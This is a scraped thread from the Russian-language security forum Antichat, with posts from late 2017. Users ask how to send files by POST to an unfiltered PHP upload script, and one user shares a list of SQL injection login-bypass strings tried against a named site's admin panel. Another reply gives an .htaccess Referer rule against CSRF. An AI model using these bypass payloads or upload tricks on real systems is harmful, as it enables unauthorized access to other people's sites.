HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2141  
Старый 28.11.2017, 12:26
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от MyNameIsWhoIsWho  
MyNameIsWhoIsWho said:

Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
Плагином для лисы
 
Ответить с цитированием

  #2142  
Старый 28.11.2017, 12:31
MyNameIsWhoIsWho
Guest
Сообщений: n/a
Провел на форуме:
1219

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Вы уверены что файл рабочий, в крации вам нужен параметр, его можно прочитать, или угадать, ткните пальцем в небо и быть может вы попадёте в звезду зелёного цвета. Надеюсь я достаточно ясно объяснил на сколько это реально сделать
Ничего не понял.

Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
 
Ответить с цитированием

  #2143  
Старый 28.11.2017, 14:12
MotherHacker
Guest
Сообщений: n/a
Провел на форуме:
2312

Репутация: 0
По умолчанию

Цитата:
Сообщение от MyNameIsWhoIsWho  
MyNameIsWhoIsWho said:

Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
Создаёшь файл на рабочем столе index.html

Открываешь файл и пишешь:

Код HTML:
HTML:
Затем открываешь index.html в браузере
 
Ответить с цитированием

  #2144  
Старый 29.11.2017, 01:57
gena ryzhov
Guest
Сообщений: n/a
Провел на форуме:
4684

Репутация: 0
По умолчанию

Цитата:
Сообщение от MotherHacker  
MotherHacker said:

Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:
Код HTML:
HTML:
Затем открываешь index.html в браузере
http://htmlbook.ru/html/form/enctype
 
Ответить с цитированием

  #2145  
Старый 29.11.2017, 07:21
MyNameIsWhoIsWho
Guest
Сообщений: n/a
Провел на форуме:
1219

Репутация: 0
По умолчанию

Цитата:
Сообщение от gena ryzhov  
Я вкурсе, спасибо)

Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)

Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.

http://clip2net.com/s/3PSUKqs
 
Ответить с цитированием

  #2146  
Старый 29.11.2017, 12:10
MotherHacker
Guest
Сообщений: n/a
Провел на форуме:
2312

Репутация: 0
По умолчанию

Цитата:
Сообщение от MyNameIsWhoIsWho  
MyNameIsWhoIsWho said:

Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs
Всё можно

https://goo.gl/VneRw3
 
Ответить с цитированием

  #2147  
Старый 29.11.2017, 23:13
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут
 
Ответить с цитированием

  #2148  
Старый 02.12.2017, 17:44
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
 
Ответить с цитированием

  #2149  
Старый 02.12.2017, 20:06
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Вот таой замечательный сайт

.SpoilerTarget" type="button">Spoiler: 1
cyber-cafe.ru/admin/
вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?

Или иногда ошибка бывает простой ошибкой без возможности авторизации?

.SpoilerTarget" type="button">Spoiler: 2
or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 
Ответить с цитированием

  #2150  
Старый 02.12.2017, 20:15
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
Код:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ